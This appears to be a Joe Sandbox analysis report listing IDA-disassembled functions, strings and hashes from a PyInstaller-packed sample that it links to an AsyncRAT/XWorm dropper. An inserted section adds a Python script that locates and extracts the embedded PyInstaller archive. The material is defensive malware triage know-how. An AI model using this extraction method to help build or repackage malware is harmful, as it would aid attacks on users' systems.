                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE310732B08BC281E768AF2164401BEB6D4AB85BD0F944338EA7D57BD5DF3CD0128358
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                      • Instruction ID: dc107afdae6819cef54890c4cdb8010b0e024a7de6f8b7b70aaa749db93f3a04
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FF0C8717182958ADB98AF6CB402A6977D0F7483C0F908239D6AD83B54CE3CC061CF64
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                      • Instruction ID: 60c2a235a24caa31297177bedc691b255f07afc4922f824b69d497a4d7d9c409
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BA0012190D88AE1E744AB00A8A04A5A360FB51300B800232E03D420F4AE2CA414D2A0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                      • API String ID: 199729137-3427451314
                                                                                                                                                                                                      • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                      • Instruction ID: 0444685bfb9bbad97c277504d2f2ae55207c9f8b04a974173d826a585a9dc325
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69027B24A4EB87A1EB14BB65B8105F4AAA1BF05755BD41235D87E032E0FF7CB568C2F0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF589400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7FF5845E4,00000000,00007FF7FF581985), ref: 00007FF7FF589439
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7FF5888A7,?,?,00000000,00007FF7FF583CBB), ref: 00007FF7FF58821C
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF582810: MessageBoxW.USER32 ref: 00007FF7FF5828EA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                      • API String ID: 1662231829-930877121
                                                                                                                                                                                                      • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                      • Instruction ID: c840423aa0d0a90424b34485ed5f33c9943444137dfb87d24c9494e46243a34a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC519411A19AC291FB50BB25E8516FAE291FF94781FC84231E93F876D5EE2CE504C7E0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
• Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
• Instruction ID: 5208bd13e88c9471ebb121d1a79eb7c18ec6bb839ce31eb62f93fd72a425a48f
• Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
• Instruction Fuzzy Hash: 2A51D626604BE186D7249F26A4181FAFBA1F798B61F404225EBEF43694DF3CD055DB20
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• API String ID: 3975851968-2863640275
• Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
• Instruction ID: a689ae1f0651379f4a7ca02aaceeab5828097c6693eed5471cac9fc214f9df41
• Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
• Instruction Fuzzy Hash: E221B725B09AC282E7416B7AA8441B9E751FF88B91FD84331DE3D473E4DE2CD5A1C3A1
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
• Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction ID: 1f306e519a96028b74d20d62fd11342280a941ce0d22d7ee19ee4a040a80e00d
• Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction Fuzzy Hash: 58126D62A0C1C386FB38BB14D1546F9B695FB41750FD44235E6BA47AC4DF3CE9888BA0
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
• Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction ID: ee94746ab76c09dc172229fd4a4af167e040987f4deffd1534f6486bc1e4e9cf
• Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction Fuzzy Hash: 03125022E0C1E386FF38BA15E0546F9E661EB40754FD84235E6B947AC4DF7CE4808BA4
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: cac4820a7b744c2a3ed9884ecbea95852d55726b30acd907294baaf881276d8e
• Instruction ID: 130b96ae9817b0e558ee9e765f441cb743f971aefdf0deaf4aa8a81fee3a9b7f
• Opcode Fuzzy Hash: cac4820a7b744c2a3ed9884ecbea95852d55726b30acd907294baaf881276d8e
• Instruction Fuzzy Hash: 80415721A0869286EB14FB12A8406FAE794BF45B84FC44632ED7D077D6DE3CE546C7E0
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 36a1ab3064973414bc50407d7382ece4e743d8df21bb13a2de201f3127f22220
• Instruction ID: 5b6b33ed697c359332aefdb7fbe7964c5e1acf495db062e22284dca0a21d8ac2
• Opcode Fuzzy Hash: 36a1ab3064973414bc50407d7382ece4e743d8df21bb13a2de201f3127f22220
• Instruction Fuzzy Hash: EC413922A086C295EB10BB22A4405F9A390BF45794FC44A32ED7D07BE5DE3CE555CBE0
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
• Instruction ID: c0b18e7f5c9e2c966aeb331c1505eb08ddfd7a0d8cbffe6cc55aafa00969d228
• Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
• Instruction Fuzzy Hash: 0AD17C32A0879187EB20ABA5D4403EDB7B0FB45798F900235EA6D57BD6DF38E484C790
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582C9E
• FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582D63
• MessageBoxW.USER32 ref: 00007FF7FF582D99
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                      • API String ID: 3940978338-251083826
                                                                                                                                                                                                      • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                      • Instruction ID: 652bea952ee70fcb8e0ddebb2e345548fb152ccc6124e73bdbcaf7afb49e76ea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3031F822708A8152E720BB25B8146EBAA91BF847C8F800235EF6D937D9DF3CD516C390
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DDBD
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DDCB
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DDF5
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DE63
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DE6F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                                                      • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                      • Instruction ID: 034e6306d75accbdad8fbccfff273b72e78dc3c04545962a54b6a043a30d2287
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC316E21B1A68291EF52AB12A8005B5A7D4FF58BA0FD94635ED3D073D4EF3CE458C2A0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                      • API String ID: 2050909247-2434346643
                                                                                                                                                                                                      • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                      • Instruction ID: f91ec75b9c3450c0b2a59517a70b53743fc71900d43145115887b6c67efab9cd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F415261A19AC791EB11FB21E4582E9A365FB44344FD00232EA7D436D6EF3CE615C7E0
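The records above carry the format strings of the PyInstaller bootloader's error reporting ([PYI-%d:ERROR] through FormatMessageW/MessageBoxW) and of its Python DLL loader (Failed to load Python DLL '%ls'., the ucrtbase.dll buffer-size messages). That is stock bootloader code; the part of the sample worth analysing is the Python archive the bootloader carries at the end of the executable. The script below is an added triage example, not part of the Joe Sandbox report or of the sample: it matches those marker strings, then locates the PyInstaller CArchive by its trailing cookie and walks the table of contents so the embedded script and PYZ entries can be pulled out. The cookie and TOC layouts (magic MEI\x0c\x0b\x0a\x0b\x0e, 88-byte big-endian cookie, 18-byte big-endian TOC entry headers followed by the name padded to a 16-byte multiple) are PyInstaller's own format constants, not something read from this report; decoding pyvers as major*100+minor assumes a PyInstaller 4.x or later build; and the image returned by build_constructed_sample() is constructed inline for the demonstration.

```python
"""Added triage helper for the PyInstaller bootloader strings listed above.
It is not part of the Joe Sandbox report or of the analysed sample."""
import struct
import zlib

# Format strings that appear in the report's String ID fields for the
# bootloader's error, warning and Python-DLL-loading routines.
PYI_BOOTLOADER_MARKERS = (
    b"[PYI-%d:ERROR]",
    b"[PYI-%d:%s]",
    b"Failed to load Python DLL '%ls'.",
    b"Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)",
)

# CArchive layout: PyInstaller format constants, not taken from this report.
COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = ">8sIIiI64s"       # magic, package length, TOC offset, TOC length, pyvers, Python DLL name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)           # 88 bytes, stored at the very end of the package
TOC_HEADER_FMT = ">iIIIBB"      # entry length, data offset, stored length, uncompressed length, cflag, typecode
TOC_HEADER_SIZE = struct.calcsize(TOC_HEADER_FMT)   # 18 bytes, followed by the null-padded entry name


def bootloader_markers(image: bytes) -> list:
    """Return the bootloader marker strings present in a PE image (in tuple order)."""
    return [m for m in PYI_BOOTLOADER_MARKERS if m in image]


def find_carchive(image: bytes):
    """Locate the cookie by searching from the end of the file, as the bootloader does, and
    return (archive_start, toc_offset, toc_len, pyvers, python_dll) or None."""
    cookie_pos = image.rfind(COOKIE_MAGIC)
    if cookie_pos < 0 or cookie_pos + COOKIE_SIZE > len(image):
        return None
    _magic, pkg_len, toc_off, toc_len, pyvers, dll = struct.unpack_from(COOKIE_FMT, image, cookie_pos)
    archive_start = cookie_pos + COOKIE_SIZE - pkg_len   # pkg_len counts the cookie itself
    if archive_start < 0:
        return None
    return archive_start, toc_off, toc_len, pyvers, dll.rstrip(b"\x00").decode()


def walk_toc(image: bytes, archive_start: int, toc_off: int, toc_len: int) -> list:
    """Return (name, typecode, payload) per TOC entry, inflating zlib-compressed entries.
    Typecodes include 's' script, 'z' PYZ archive, 'b' binary, 'x' data, 'o' runtime option."""
    pos, end, entries = archive_start + toc_off, archive_start + toc_off + toc_len, []
    while pos < end:
        entry_len, off, clen, _ulen, cflag, typecode = struct.unpack_from(TOC_HEADER_FMT, image, pos)
        name = image[pos + TOC_HEADER_SIZE:pos + entry_len].rstrip(b"\x00").decode()
        raw = image[archive_start + off:archive_start + off + clen]   # offsets are relative to the archive
        entries.append((name, chr(typecode), zlib.decompress(raw) if cflag else raw))
        pos += entry_len
    return entries


def build_constructed_sample() -> bytes:
    """Constructed test image: a fake PE stub carrying two bootloader strings, followed by a
    two-entry CArchive (one zlib-compressed script, one stored PYZ blob) and its cookie."""
    stub = b"MZ\x90\x00" + b"\x00" * 60 + b"[PYI-%d:ERROR]\x00Failed to load Python DLL '%ls'.\x00"
    items = [("pyiboot01_bootstrap", "s", b"# constructed bootstrap script\n", True),
             ("PYZ-00.pyz", "z", b"PYZ\x00constructed-pyz-blob", False)]
    blobs, toc = b"", b""
    for name, typecode, payload, compress in items:
        stored = zlib.compress(payload) if compress else payload
        entry_len = TOC_HEADER_SIZE + len(name)
        entry_len += (-entry_len) % 16            # entries are padded to a multiple of 16 bytes
        toc += struct.pack(TOC_HEADER_FMT, entry_len, len(blobs), len(stored), len(payload),
                           int(compress), ord(typecode))
        toc += name.encode().ljust(entry_len - TOC_HEADER_SIZE, b"\x00")
        blobs += stored
    pkg_len = len(blobs) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, COOKIE_MAGIC, pkg_len, len(blobs), len(toc), 311, b"python311.dll")
    return stub + blobs + toc + cookie


if __name__ == "__main__":
    img = build_constructed_sample()
    print("bootloader markers:", bootloader_markers(img))
    start, toc_off, toc_len, pyvers, dll = find_carchive(img)
    print("archive @ %#x, Python %d.%d via %s" % (start, *divmod(pyvers, 100), dll))
    for name, typecode, payload in walk_toc(img, start, toc_off, toc_len):
        print(f"  [{typecode}] {name}: {len(payload)} bytes")
```

On a real one-file build, read the whole executable into image and hand it to find_carchive() and walk_toc(); the 's' entries are the entry-point scripts and the 'z' entry is the PYZ holding the compiled modules, which is where the AsyncRAT/XWorm dropper logic lives rather than in the native functions listed here.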
APIs
• GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7FF58351A,?,00000000,00007FF7FF583F23), ref: 00007FF7FF582AA0
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-2900015858
• Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
• Instruction ID: 496f0574b170c3ee05a47b060994296b557076bf22040d951dd61f4e7a784b42
• Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
• Instruction Fuzzy Hash: 2821A3326197C192E720AB51B8417E6A794FB887C4F800231EEAD43699DF7CD645C790

Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
• Instruction ID: 784c47c2e81931832228ac7914824a95dcd60d85791ae149f28b2d624b9da380
• Opcode Fuzzy Hash: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
• Instruction Fuzzy Hash: 50217C24E0D6CA92FB7C736156511FDE2829F447A0F948734D93E47AE6DE2CA40183E0

Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
